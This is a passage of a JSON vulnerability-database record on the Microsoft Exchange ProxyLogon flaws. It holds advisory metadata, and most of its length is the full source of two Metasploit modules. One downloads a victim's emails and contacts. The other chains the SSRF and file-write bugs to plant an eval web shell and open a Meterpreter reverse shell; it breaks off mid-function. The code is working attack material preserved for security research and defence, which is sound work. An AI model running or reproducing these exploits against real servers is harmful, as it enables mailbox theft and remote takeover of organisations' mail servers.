"NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26857", "CVE-2021-26855", "CVE-2021-26865", "CVE-2021-26858"], "modified": "2021-12-15T14:41:36", "id": "35B21CE7-1E51-5824-B70E-36480A6E8763", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:35:14", "description": "A remote code execution vulnerability exists in Microsoft Microsoft Exchange. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-02T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Exchange Server Remote Code Execution (CVE-2021-26855; CVE-2021-27065)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-03-11T00:00:00", "id": "CPAI-2021-0099", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:35:14", "description": "A remote code execution vulnerability exists in VMware View Planner. The vulnerability is due to improper validation of HTTP request to logupload endpoint. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-14T00:00:00", "type": "checkpoint_advisories", "title": "VMware View Planner Remote Code Execution (CVE-2021-21978)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21978"], "modified": "2021-03-14T00:00:00", "id": "CPAI-2021-0148", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-05-21T16:03:52", "description": "", "cvss3": {}, "published": "2021-05-21T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange ProxyLogon Collector", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-05-21T00:00:00", "id": "PACKETSTORM:162736", "href": "https://packetstormsecurity.com/files/162736/Microsoft-Exchange-ProxyLogon-Collector.html", "sourceData": "`# Exploit Title: Microsoft Exchange 2019 - Unauthenticated Email Download (Metasploit) \n# Date: 2021-03-02 \n# Exploit Author: RAMELLA S\u00e9bastien \n# Vendor Homepage: https://microsoft.com \n# Version: This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, \nExchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, \nExchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010). \n# Tested on: Microsoft Windows 2012 R2 - Exchange 2016 \n \n## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \n# begin auxiliary class \nclass MetasploitModule < Msf::Auxiliary \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Exchange ProxyLogon Collector', \n'Description' => %q{ \nThis module scan for a vulnerability on Microsoft Exchange Server that \nallows an attacker bypassing the authentication and impersonating as the \nadmin (CVE-2021-26855). \n \nBy chaining this bug with another post-auth arbitrary-file-write \nvulnerability to get code execution (CVE-2021-27065). \n \nAs a result, an unauthenticated attacker can execute arbitrary commands on \nMicrosoft Exchange Server. \n \nThis vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, \nExchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, \nExchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010). \n \nAll components are vulnerable by default. \n}, \n'Author' => [ \n'mekhalleh (RAMELLA S\u00e9bastien)' # Module author (Zeop Entreprise) \n], \n'References' => [ \n['CVE', '2021-26855'], \n['LOGO', 'https://proxylogon.com/images/logo.jpg'], \n['URL', 'https://proxylogon.com/'], \n['URL', 'https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse'], \n['URL', 'http://aka.ms/exchangevulns'] \n], \n'DisclosureDate' => '2021-03-02', \n'License' => MSF_LICENSE, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Notes' => { \n'AKA' => ['ProxyLogon'] \n} \n) \n) \n \nregister_options([ \nOptString.new('EMAIL', [true, 'The email account what you want dump']), \nOptString.new('FOLDER', [true, 'The email folder what you want dump', 'inbox']), \nOptString.new('SERVER_NAME', [true, 'The name of secondary internal Exchange server targeted']) \n]) \n \nregister_advanced_options([ \nOptInt.new('MaxEntries', [false, 'Override the maximum number of object to dump', 512]) \n]) \nend \n \nXMLNS = { 't' => 'http://schemas.microsoft.com/exchange/services/2006/types' }.freeze \n \ndef grab_contacts \nresponse = send_xml(soap_findcontacts) \nxml = Nokogiri::XML.parse(response.body) \n \ndata = xml.xpath('//t:Contact', XMLNS) \nif data.empty? \nprint_status(' - the user has no contacts') \nelse \nwrite_loot(data.to_s) \nend \nend \n \ndef grab_emails(total_count) \n# get the emails list of the target folder. \nresponse = send_xml(soap_maillist(total_count)) \nxml = Nokogiri::XML.parse(response.body) \n \n# iteration to download the emails. \nxml.xpath('//t:ItemId', XMLNS).each do |item| \nprint_status(\" - download item: #{item.values[1]}\") \nresponse = send_xml(soap_download(item.values[0], item.values[1])) \nxml = Nokogiri::XML.parse(response.body) \n \nmessage = xml.at_xpath('//t:MimeContent', XMLNS).content \nwrite_loot(Rex::Text.decode_base64(message)) \nend \nend \n \ndef send_xml(data) \nuri = normalize_uri('ecp', 'temp.js') \n \nreceived = send_request_cgi( \n'method' => 'POST', \n'uri' => uri, \n'cookie' => \"X-BEResource=#{datastore['SERVER_NAME']}/EWS/Exchange.asmx?a=~3;\", \n'ctype' => 'text/xml; charset=utf-8', \n'data' => data \n) \nfail_with(Failure::Unknown, 'Server did not respond in an expected way') unless received \n \nreceived \nend \n \ndef soap_download(id, change_key) \n<<~SOAP \n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \nxmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \nxmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \nxmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Body> \n<m:GetItem> \n<m:ItemShape> \n<t:BaseShape>IdOnly</t:BaseShape> \n<t:IncludeMimeContent>true</t:IncludeMimeContent> \n</m:ItemShape> \n<m:ItemIds> \n<t:ItemId Id=\"#{id}\" ChangeKey=\"#{change_key}\" /> \n</m:ItemIds> \n</m:GetItem> \n</soap:Body> \n</soap:Envelope> \nSOAP \nend \n \ndef soap_findcontacts \n<<~SOAP \n<?xml version='1.0' encoding='utf-8'?> \n<soap:Envelope \nxmlns:soap='http://schemas.xmlsoap.org/soap/envelope/' \nxmlns:t='http://schemas.microsoft.com/exchange/services/2006/types' \nxmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages' \nxmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'> \n<soap:Body> \n<m:FindItem Traversal='Shallow'> \n<m:ItemShape> \n<t:BaseShape>AllProperties</t:BaseShape> \n</m:ItemShape> \n<m:IndexedPageItemView MaxEntriesReturned=\"#{datastore['MaxEntries']}\" Offset=\"0\" BasePoint=\"Beginning\" /> \n<m:ParentFolderIds> \n<t:DistinguishedFolderId Id='contacts'> \n<t:Mailbox> \n<t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress> \n</t:Mailbox> \n</t:DistinguishedFolderId> \n</m:ParentFolderIds> \n</m:FindItem> \n</soap:Body> \n</soap:Envelope> \nSOAP \nend \n \ndef soap_mailnum \n<<~SOAP \n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \nxmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \nxmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \nxmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Body> \n<m:GetFolder> \n<m:FolderShape> \n<t:BaseShape>Default</t:BaseShape> \n</m:FolderShape> \n<m:FolderIds> \n<t:DistinguishedFolderId Id=\"#{datastore['FOLDER']}\"> \n<t:Mailbox> \n<t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress> \n</t:Mailbox> \n</t:DistinguishedFolderId> \n</m:FolderIds> \n</m:GetFolder> \n</soap:Body> \n</soap:Envelope> \nSOAP \nend \n \ndef soap_maillist(max_entries) \n<<~SOAP \n<?xml version='1.0' encoding='utf-8'?> \n<soap:Envelope \nxmlns:soap='http://schemas.xmlsoap.org/soap/envelope/' \nxmlns:t='http://schemas.microsoft.com/exchange/services/2006/types' \nxmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages' \nxmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'> \n<soap:Body> \n<m:FindItem Traversal='Shallow'> \n<m:ItemShape> \n<t:BaseShape>AllProperties</t:BaseShape> \n</m:ItemShape> \n<m:IndexedPageItemView MaxEntriesReturned=\"#{max_entries}\" Offset=\"0\" BasePoint=\"Beginning\" /> \n<m:ParentFolderIds> \n<t:DistinguishedFolderId Id='#{datastore['FOLDER']}'> \n<t:Mailbox> \n<t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress> \n</t:Mailbox> \n</t:DistinguishedFolderId> \n</m:ParentFolderIds> \n</m:FindItem> \n</soap:Body> \n</soap:Envelope> \nSOAP \nend \n \ndef write_loot(data) \nloot_path = store_loot('', 'text/plain', datastore['RHOSTS'], data, '', '') \nprint_good(\" - file saved to #{loot_path}\") \nend \n \ndef run \n# get the informations about the targeted user account. \nresponse = send_xml(soap_mailnum) \nif response.body =~ /Success/ \nprint_status('Connection to the server is successful') \nprint_status(\" - selected account: #{datastore['EMAIL']}\\n\") \n \n# grab contacts. \nprint_status('Attempt to dump contacts list for this user') \ngrab_contacts \n \nprint_line \n \n# grab emails. \nprint_status('Attempt to dump emails for this user') \nxml = Nokogiri::XML.parse(response.body) \nfolder_id = xml.at_xpath('//t:FolderId', XMLNS).values \nprint_status(\" - selected folder: #{datastore['FOLDER']} (#{folder_id[0]})\") \n \ntotal_count = xml.at_xpath('//t:TotalCount', XMLNS).content \nprint_status(\" - number of email found: #{total_count}\") \n \nif total_count.to_i > datastore['MaxEntries'] \nprint_warning(\" - number of email recaluled due to max entries: #{datastore['MaxEntries']}\") \ntotal_count = datastore['MaxEntries'].to_s \nend \ngrab_emails(total_count) \nend \nend \n \nend \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162736/msexchange-disclose.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-23T16:45:01", "description": "", "cvss3": {}, "published": "2021-03-23T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange ProxyLogon Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-03-23T00:00:00", "id": "PACKETSTORM:161938", "href": "https://packetstormsecurity.com/files/161938/Microsoft-Exchange-ProxyLogon-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \n \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::Remote::CheckModule \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Exchange ProxyLogon RCE', \n'Description' => %q{ \nThis module exploit a vulnerability on Microsoft Exchange Server that \nallows an attacker bypassing the authentication, impersonating as the \nadmin (CVE-2021-26855) and write arbitrary file (CVE-2021-27065) to get \nthe RCE (Remote Code Execution). \n \nBy taking advantage of this vulnerability, you can execute arbitrary \ncommands on the remote Microsoft Exchange Server. \n \nThis vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, \nExchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, \nExchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010). \n \nAll components are vulnerable by default. \n}, \n'Author' => [ \n'Orange Tsai', # Dicovery (Officially acknowledged by MSRC) \n'Jang (@testanull)', # Vulnerability analysis + PoC (https://twitter.com/testanull) \n'mekhalleh (RAMELLA S\u00e9bastien)', # Module author independent researcher (who listen to 'Le Comptoir Secu' and work at Zeop Entreprise) \n'print(\"\")', # https://www.o2oxy.cn/3169.html \n'lotusdll' # https://twitter.com/lotusdll/status/1371465073525362691 \n], \n'References' => [ \n['CVE', '2021-26855'], \n['CVE', '2021-27065'], \n['LOGO', 'https://proxylogon.com/images/logo.jpg'], \n['URL', 'https://proxylogon.com/'], \n['URL', 'http://aka.ms/exchangevulns'], \n['URL', 'https://www.praetorian.com/blog/reproducing-proxylogon-exploit'], \n[ \n'URL', \n'https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-proxylogon-mail-exchange-rce-s%E1%BB%B1-k%E1%BA%BFt-h%E1%BB%A3p-ho%C3%A0n-h%E1%BA%A3o-cve-2021-26855-37f4b6e06265' \n], \n['URL', 'https://www.o2oxy.cn/3169.html'], \n['URL', 'https://github.com/Zeop-CyberSec/proxylogon_writeup'] \n], \n'DisclosureDate' => '2021-03-02', \n'License' => MSF_LICENSE, \n'DefaultOptions' => { \n'CheckModule' => 'auxiliary/scanner/http/exchange_proxylogon', \n'HttpClientTimeout' => 60, \n'RPORT' => 443, \n'SSL' => true, \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' \n}, \n'Platform' => ['windows'], \n'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Windows Powershell', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_X64, ARCH_X86], \n'Type' => :windows_powershell, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' \n} \n} \n], \n[ \n'Windows Dropper', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_X64, ARCH_X86], \n'Type' => :windows_dropper, \n'CmdStagerFlavor' => %i[psh_invokewebrequest], \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', \n'CMDSTAGER::FLAVOR' => 'psh_invokewebrequest' \n} \n} \n], \n[ \n'Windows Command', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_CMD], \n'Type' => :windows_command, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], \n'AKA' => ['ProxyLogon'] \n} \n) \n) \n \nregister_options([ \nOptString.new('EMAIL', [true, 'A known email address for this organization']), \nOptEnum.new('METHOD', [true, 'HTTP Method to use for the check', 'POST', ['GET', 'POST']]), \nOptBool.new('UseAlternatePath', [true, 'Use the IIS root dir as alternate path', false]) \n]) \n \nregister_advanced_options([ \nOptString.new('ExchangeBasePath', [true, 'The base path where exchange is installed', 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15']), \nOptString.new('ExchangeWritePath', [true, 'The path where you want to write the backdoor', 'owa\\\\auth']), \nOptString.new('IISBasePath', [true, 'The base path where IIS wwwroot directory is', 'C:\\\\inetpub\\\\wwwroot']), \nOptString.new('IISWritePath', [true, 'The path where you want to write the backdoor', 'aspnet_client']), \nOptString.new('MapiClientApp', [true, 'This is MAPI client version sent in the request', 'Outlook/15.0.4815.1002']), \nOptInt.new('MaxWaitLoop', [true, 'Max counter loop to wait for OAB Virtual Dir reset', 30]), \nOptString.new('UserAgent', [true, 'The HTTP User-Agent sent in the request', 'Mozilla/5.0']) \n]) \nend \n \ndef cmd_windows_generic? \ndatastore['PAYLOAD'] == 'cmd/windows/generic' \nend \n \ndef encode_cmd(cmd) \ncmd.gsub!('\\\\', '\\\\\\\\\\\\') \ncmd.gsub('\"', '\\u0022').gsub('&', '\\u0026').gsub('+', '\\u002b') \nend \n \ndef execute_command(cmd, _opts = {}) \ncmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\").StdOut.ReadAll());\" \nsend_request_raw( \n'method' => 'POST', \n'uri' => normalize_uri(web_directory, @random_filename), \n'ctype' => 'application/x-www-form-urlencoded', \n'data' => \"#{@random_inputname}=#{cmd}\" \n) \nend \n \ndef install_payload(exploit_info) \n# exploit_info: [server_name, sid, session, canary, oab_id] \n \ninput_name = rand_text_alpha(4..8).to_s \nshell = \"http://o/#<script language=\\\"JScript\\\" runat=\\\"server\\\">function Page_Load(){eval(Request[\\\"#{input_name}\\\"],\\\"unsafe\\\");}</script>\" \ndata = { \nidentity: { \n__type: 'Identity:ECP', \nDisplayName: (exploit_info[4][0]).to_s, \nRawIdentity: (exploit_info[4][1]).to_s \n}, \nproperties: { \nParameters: { \n__type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel', \nExternalUrl: shell.to_s \n} \n} \n}.to_json \n \nresponse = send_http( \n'POST', \n\"Admin@#{exploit_info[0]}:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=#{exploit_info[3]}&a=~#{random_ssrf_id}\", \ndata: data, \ncookie: exploit_info[2], \nctype: 'application/json; charset=utf-8', \nheaders: { \n'msExchLogonMailbox' => patch_sid(exploit_info[1]), \n'msExchTargetMailbox' => patch_sid(exploit_info[1]), \n'X-vDirObjectId' => (exploit_info[4][1]).to_s \n} \n) \nreturn '' if response.code != 200 \n \ninput_name \nend \n \ndef message(msg) \n\"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\" \nend \n \ndef patch_sid(sid) \nar = sid.to_s.split('-') \nif ar[-1] != '500' \nsid = \"#{ar[0..6].join('-')}-500\" \nend \n \nsid \nend \n \ndef random_mapi_id \nid = \"{#{Rex::Text.rand_text_hex(8)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(4)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(4)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(4)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(12)}}\" \nid.upcase \nend \n \ndef random_ssrf_id \n# https://en.wikipedia.org/wiki/2,147,483,647 (lol) \n# max. 2147483647 \nrand(1941962752..2147483647) \nend \n \ndef request_autodiscover(server_name) \nxmlns = { 'xmlns' => 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a' } \n \nresponse = send_http( \n'POST', \n\"#{server_name}/autodiscover/autodiscover.xml?a=~#{random_ssrf_id}\", \ndata: soap_autodiscover, \nctype: 'text/xml; charset=utf-8' \n) \n \ncase response.body \nwhen %r{<ErrorCode>500</ErrorCode>} \nfail_with(Failure::NotFound, 'No Autodiscover information was found') \nwhen %r{<Action>redirectAddr</Action>} \nfail_with(Failure::NotFound, 'No email address was found') \nend \n \nxml = Nokogiri::XML.parse(response.body) \n \nlegacy_dn = xml.at_xpath('//xmlns:User/xmlns:LegacyDN', xmlns)&.content \nfail_with(Failure::NotFound, 'No \\'LegacyDN\\' was found') if legacy_dn.nil? || legacy_dn.empty? \n \nserver = '' \nxml.xpath('//xmlns:Account/xmlns:Protocol', xmlns).each do |item| \ntype = item.at_xpath('./xmlns:Type', xmlns)&.content \nif type == 'EXCH' \nserver = item.at_xpath('./xmlns:Server', xmlns)&.content \nend \nend \nfail_with(Failure::NotFound, 'No \\'Server ID\\' was found') if server.nil? || server.empty? \n \n[server, legacy_dn] \nend \n \n# https://docs.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-oxcmapihttp/c245390b-b115-46f8-bc71-03dce4a34bff \ndef request_mapi(server_name, legacy_dn, server_id) \ndata = \"#{legacy_dn}\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\" \nheaders = { \n'X-RequestType' => 'Connect', \n'X-ClientInfo' => random_mapi_id, \n'X-ClientApplication' => datastore['MapiClientApp'], \n'X-RequestId' => \"#{random_mapi_id}:#{Rex::Text.rand_text_numeric(5)}\" \n} \n \nsid = '' \nresponse = send_http( \n'POST', \n\"Admin@#{server_name}:444/mapi/emsmdb?MailboxId=#{server_id}&a=~#{random_ssrf_id}\", \ndata: data, \nctype: 'application/mapi-http', \nheaders: headers \n) \nif response.code == 200 \nsid_regex = /S-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*/ \n \nsid = response.body.match(sid_regex).to_s \nend \nfail_with(Failure::NotFound, 'No \\'SID\\' was found') if sid.empty? \n \nsid \nend \n \ndef request_oab(server_name, sid, session, canary) \ndata = { \nfilter: { \nParameters: { \n__type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel', \nSelectedView: '', \nSelectedVDirType: 'OAB' \n} \n}, \nsort: {} \n}.to_json \n \nresponse = send_http( \n'POST', \n\"Admin@#{server_name}:444/ecp/DDI/DDIService.svc/GetList?reqId=1615583487987&schema=VirtualDirectory&msExchEcpCanary=#{canary}&a=~#{random_ssrf_id}\", \ndata: data, \ncookie: session, \nctype: 'application/json; charset=utf-8', \nheaders: { \n'msExchLogonMailbox' => patch_sid(sid), \n'msExchTargetMailbox' => patch_sid(sid) \n} \n) \n \nif response.code == 200 \ndata = JSON.parse(response.body) \ndata['d']['Output'].each do |oab| \nif oab['Server'].downcase == server_name.downcase \nreturn [oab['Identity']['DisplayName'], oab['Identity']['RawIdentity']] \nend \nend \nend \n \n[] \nend \n \ndef request_proxylogon(server_name, sid) \ndata = \"<r at=\\\"Negotiate\\\" ln=\\\"#{datastore['EMAIL'].split('@')[0]}\\\"><s>#{sid}</s></r>\" \nsession_id = '' \ncanary = '' \n \nresponse = send_http( \n'POST', \n\"Admin@#{server_name}:444/ecp/proxyLogon.ecp?a=~#{random_ssrf_id}\", \ndata: data, \nctype: 'text/xml; charset=utf-8', \nheaders: { \n'msExchLogonMailbox' => patch_sid(sid), \n'msExchTargetMailbox' => patch_sid(sid) \n} \n) \nif response.code == 241 \nsession_id = response.get_cookies.scan(/ASP\\.NET_SessionId=([\\w\\-]+);/).flatten[0] \ncanary = response.get_cookies.scan(/msExchEcpCanary=([\\w\\-_.]+);*/).flatten[0] # coin coin coin ... \nend \n \n[session_id, canary] \nend \n \n# pre-authentication SSRF (Server Side Request Forgery) + impersonate as admin. \ndef run_cve_2021_26855 \n# request for internal server name. \nresponse = send_http(datastore['METHOD'], \"localhost~#{random_ssrf_id}\") \nif response.code != 500 || !response.headers.to_s.include?('X-FEServer') \nfail_with(Failure::NotFound, 'No \\'X-FEServer\\' was found') \nend \n \nserver_name = response.headers['X-FEServer'] \nprint_status(\"Internal server name (#{server_name})\") \n \n# get informations by autodiscover request. \nprint_status(message('Sending autodiscover request')) \nserver_id, legacy_dn = request_autodiscover(server_name) \n \nprint_status(\"Server: #{server_id}\") \nprint_status(\"LegacyDN: #{legacy_dn}\") \n \n# get the user UID using mapi request. \nprint_status(message('Sending mapi request')) \nsid = request_mapi(server_name, legacy_dn, server_id) \nprint_status(\"SID: #{sid} (#{datastore['EMAIL']})\") \n \n# search oab \nsid, session, canary, oab_id = search_oab(server_name, sid) \n \n[server_name, sid, session, canary, oab_id] \nend \n \n# post-auth arbitrary file write. \ndef run_cve_2021_27065(session_info) \n# set external url (and set the payload). \nprint_status('Prepare the payload on the remote target') \ninput_name = install_payload(session_info) \n \nfail_with(Failure::NoAccess, 'Could\\'t prepare the payload on the remote target') if input_name.empty? \n \n# reset the virtual directory (and write the payload). \nprint_status('Write the payload on the remote target') \nremote_file = write_payload(session_info) \n \nfail_with(Failure::NoAccess, 'Could\\'t write the payload on the remote target') if remote_file.empty? \n \n# wait a lot. \ni = 0 \nwhile i < datastore['MaxWaitLoop'] \nreceived = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(web_directory, remote_file) \n}) \nif received && (received.code == 200) \nbreak \nend \n \nprint_warning(\"Wait a lot (#{i})\") \nsleep 5 \ni += 1 \nend \nfail_with(Failure::PayloadFailed, 'Could\\'t take the remote backdoor (see. ExchangePathBase option)') if received.code == 302 \n \n[input_name, remote_file] \nend \n \ndef search_oab(server_name, sid) \n# request cookies (session and canary) \nprint_status(message('Sending ProxyLogon request')) \n \nprint_status('Try to get a good msExchCanary (by patching user SID method)') \nsession_id, canary = request_proxylogon(server_name, patch_sid(sid)) \nif canary \nsession = \"ASP.NET_SessionId=#{session_id}; msExchEcpCanary=#{canary};\" \noab_id = request_oab(server_name, sid, session, canary) \nend \n \nif oab_id.nil? || oab_id.empty? \nprint_status('Try to get a good msExchCanary (without correcting the user SID)') \nsession_id, canary = request_proxylogon(server_name, sid) \nif canary \nsession = \"ASP.NET_SessionId=#{session_id}; msExchEcpCanary=#{canary};\" \noab_id = request_oab(server_name, sid, session, canary) \nend \nend \n \nfail_with(Failure::NotFound, 'No \\'ASP.NET_SessionId\\' was found') if session_id.nil? || session_id.empty? \nfail_with(Failure::NotFound, 'No \\'msExchEcpCanary\\' was found') if canary.nil? || canary.empty? \nfail_with(Failure::NotFound, 'No \\'OAB Id\\' was found') if oab_id.nil? || oab_id.empty? \n \nprint_status(\"ASP.NET_SessionId: #{session_id}\") \nprint_status(\"msExchEcpCanary: #{canary}\") \nprint_status(\"OAB id: #{oab_id[1]} (#{oab_id[0]})\") \n \nreturn [sid, session, canary, oab_id] \nend \n \ndef send_http(method, ssrf, opts = {}) \nssrf = \"X-BEResource=#{ssrf};\" \nif opts[:cookie] && !opts[:cookie].empty? \nopts[:cookie] = \"#{ssrf} #{opts[:cookie]}\" \nelse \nopts[:cookie] = ssrf.to_s \nend \n \nopts[:ctype] = 'application/x-www-form-urlencoded' if opts[:ctype].nil? \n \nrequest = { \n'method' => method, \n'uri' => @random_uri, \n'agent' => datastore['UserAgent'], \n'ctype' => opts[:ctype] \n} \nrequest = request.merge({ 'data' => opts[:data] }) unless opts[:data].nil? \nrequest = request.merge({ 'cookie' => opts[:cookie] }) unless opts[:cookie].nil? \nrequest = request.merge({ 'headers' => opts[:headers] }) unless opts[:headers].nil? \n \nreceived = send_request_cgi(request) \nfail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received \n \nreceived \nend \n \ndef soap_autodiscover \n<<~SOAP \n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\"> \n<Request> \n<EMailAddress>#{datastore['EMAIL']}</EMailAddress> \n<AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> \n</Request> \n</Autodiscover> \nSOAP \nend \n \ndef web_directory \nif datastore['UseAlternatePath'] \nweb_dir = datastore['IISWritePath'].gsub('\\\\', '/') \nelse \nweb_dir = datastore['ExchangeWritePath'].gsub('\\\\', '/') \nend \nweb_dir \nend \n \ndef write_payload(exploit_info) \n# exploit_info: [server_name, sid, session, canary, oab_id] \n \nremote_file = \"#{rand_text_alpha(4..8)}.aspx\" \nif 